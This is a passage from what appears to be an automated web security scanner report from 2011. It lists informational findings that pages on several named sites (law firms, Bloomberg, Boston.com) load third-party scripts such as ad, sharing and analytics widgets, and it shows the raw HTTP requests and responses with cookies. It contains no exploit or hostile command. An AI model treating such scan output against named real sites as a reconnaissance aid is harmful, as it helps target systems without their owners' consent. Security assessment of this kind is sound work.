...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
25.3. http://layserfreiwald.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=7d8fe508%2D7e3a%2D406d%2D978b%2Daf2ef35e4854; path=/; expires=Sat, 11-May-2041 02:00:28 GMT
Set-Cookie: CFTOKEN=0; path=/; expires=Sat, 11-May-2041 02:00:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
</script>

<script type="text/javascript" src="http://labs.natpal.com/onesite/attrdetect?clientId=44899"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://labs.natpal.com/trac/js/ena.js?trkDomain=layserfreiwald.com"></script>
<script type="text/javascript" src="http://labs.natpal.com/trk/leadscript"></script>
...[SNIP]...
25.4. http://layserfreiwald.com/attorneys.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /attorneys.html?mode=view&AID=8 HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:13:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 11012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
</script>

<script type="text/javascript" src="http://labs.natpal.com/onesite/attrdetect?clientId=44899"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://labs.natpal.com/trac/js/ena.js?trkDomain=layserfreiwald.com"></script>
<script type="text/javascript" src="http://labs.natpal.com/trk/leadscript"></script>
...[SNIP]...
25.5. http://layserfreiwald.com/practice_areas/insurance_coverage_and_bad_faith.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /practice_areas/insurance_coverage_and_bad_faith.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /practice_areas/insurance_coverage_and_bad_faith.html HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:13:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 8655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
</script>

<script type="text/javascript" src="http://labs.natpal.com/onesite/attrdetect?clientId=44899"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://labs.natpal.com/trac/js/ena.js?trkDomain=layserfreiwald.com"></script>
<script type="text/javascript" src="http://labs.natpal.com/trk/leadscript"></script>
...[SNIP]...
25.6. http://m.perkinscoie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/professionals/professionals.aspx
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:18 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=3814; path=/
Set-Cookie: PortletId=4736294; path=/
Set-Cookie: SiteId=3811; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=s0z4wdju4luw2z2svixkbpyw; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 7874
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660;path=/
Content-Length: 7874


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Perkins Coie Mobile Site
</title><meta name="viewport" content="width=device-width; initial-scale=1.0; user-scalable=1;" /><link rel="
...[SNIP]...
</div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
25.7. http://m.perkinscoie.com/practices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /practices/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /practices/ HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.perkinscoie.com/publications/
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=3820; PortletId=4737494; SiteId=3811; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=u1pig42zp4pybpu2rug2dqbl; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:54:24 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=3818; path=/
Set-Cookie: PortletId=4737094; path=/
Set-Cookie: SiteId=3811; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 37717
Content-Length: 37717


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

Services


|
Perkins Coie Mobile Site
</title><meta name="viewport" conte
...[SNIP]...
</script>


<script language="javascript" type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
25.8. http://m.perkinscoie.com/publications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /publications/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /publications/ HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.perkinscoie.com/
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=3814; PortletId=4736294; SiteId=3811; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=u1pig42zp4pybpu2rug2dqbl; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:51:56 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=3820; path=/
Set-Cookie: PortletId=4737494; path=/
Set-Cookie: SiteId=3811; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 10391
Content-Length: 10391


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

Publications


|
Perkins Coie Mobile Site
</title><meta name="viewport" c
...[SNIP]...
</div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
25.9. http://www.bloomberg.com/apps/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /apps/news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /apps/news HTTP/1.1
Host: www.bloomberg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=55
Date: Thu, 12 May 2011 16:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47781

<!DOCTYPE HTML PUBLIC "-//W3C/DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/transitional.dtd">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>Top
...[SNIP]...
<td align="right"><SCRIPT xmlns:wn="http://www.bloomberg.com/bloomberg-web-news" SRC="http://ad.doubleclick.net/adj/bloomberg.test/;abr=!webtv;sz=120x600;tile=1;ord=68472905077783090?" language="JavaScript1.1"></SCRIPT>
...[SNIP]...
25.10. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/ HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:06 GMT
Server: Apache/2.2.17 (Linux/SUSE) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;
Accept-Ranges: bytes
Served-By: nefertiti
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;
Content-Length: 37920

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Convention center gets $24m settlement - The Boston Globe</titl
...[SNIP]...
</script><script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
...[SNIP]...
25.11. http://www.centrifugesystems.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centrifugesystems.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.centrifugesystems.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:50:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.2
Content-Type: text/html; charset=UTF-8
Content-Length: 21422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div style="padding:5px 0 0 22px"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=68a7b9dc-20bf-43c4-96c0-46d3e91a7d4b&amp;type=website&amp;style=rotate"></script>
...[SNIP]...
</script> -->
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
25.12. http://www.centrifugesystems.com/images/01_Home/ad_02/bg_Left.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centrifugesystems.com
Path:   /images/01_Home/ad_02/bg_Left.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/01_Home/ad_02/bg_Left.png HTTP/1.1
Host: www.centrifugesystems.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.centrifugesystems.com/includes/centrifuge.css
Cookie: __unam=44d1d63-12fe5adec5a-43b9b829-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 19:50:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.2
Content-Type: text/html; charset=UTF-8
Content-Length: 14660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div style="text-align:center; padding:2px"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=68a7b9dc-20bf-43c4-96c0-46d3e91a7d4b&amp;type=website&amp;style=rotate"></script>
...[SNIP]...
</script> -->
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
25.13. http://www.centrifugesystems.com/images/01_Home/ad_02/bg_Top.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centrifugesystems.com
Path:   /images/01_Home/ad_02/bg_Top.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/01_Home/ad_02/bg_Top.png HTTP/1.1
Host: www.centrifugesystems.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.centrifugesystems.com/includes/centrifuge.css
Cookie: __unam=44d1d63-12fe5adec5a-43b9b829-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 19:50:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.2
Content-Type: text/html; charset=UTF-8
Content-Length: 14660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div style="text-align:center; padding:2px"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=68a7b9dc-20bf-43c4-96c0-46d3e91a7d4b&amp;type=website&amp;style=rotate"></script>
...[SNIP]...
</script> -->
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
25.14. http://www.dmoc.com/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmoc.com
Path:   /contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact HTTP/1.1
Host: www.dmoc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dmoc.com/practice
Cookie: SESS97997ab7f65dbfa3475cc6e258e81de7=58296304a4b8ec99476daf96829e277a; __utma=101869332.609237140.1305202772.1305202772.1305223694.2; __utmz=101869332.1305223694.2.2.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/diserio-martin-oconnor-castiglioni-llp; has_js=1; __utmb=101869332.2.10.1305223694; __utmc=101869332

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:09:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 18:09:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.15. http://www.dmoc.com/practice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmoc.com
Path:   /practice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /practice HTTP/1.1
Host: www.dmoc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dmoc.com/
Cookie: SESS97997ab7f65dbfa3475cc6e258e81de7=58296304a4b8ec99476daf96829e277a; __utma=101869332.609237140.1305202772.1305202772.1305223694.2; __utmz=101869332.1305223694.2.2.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/diserio-martin-oconnor-castiglioni-llp; has_js=1; __utmb=101869332.1.10.1305223694; __utmc=101869332

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
ETag: "ac456355064319c4f539917f32311c95"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Last-Modified: Thu, 12 May 2011 16:37:46 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.16. http://www.elawmarketing.com/about/clients  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /about/clients

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/clients HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8
If-Modified-Since: Thu, 12 May 2011 12:19:33 GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:01:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 16:01:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.17. http://www.elawmarketing.com/about/staff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /about/staff

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/staff HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/about/clients
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1
If-Modified-Since: Thu, 12 May 2011 12:16:00 GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:35:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 16:35:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.18. http://www.elawmarketing.com/portfolio  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /portfolio

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portfolio HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
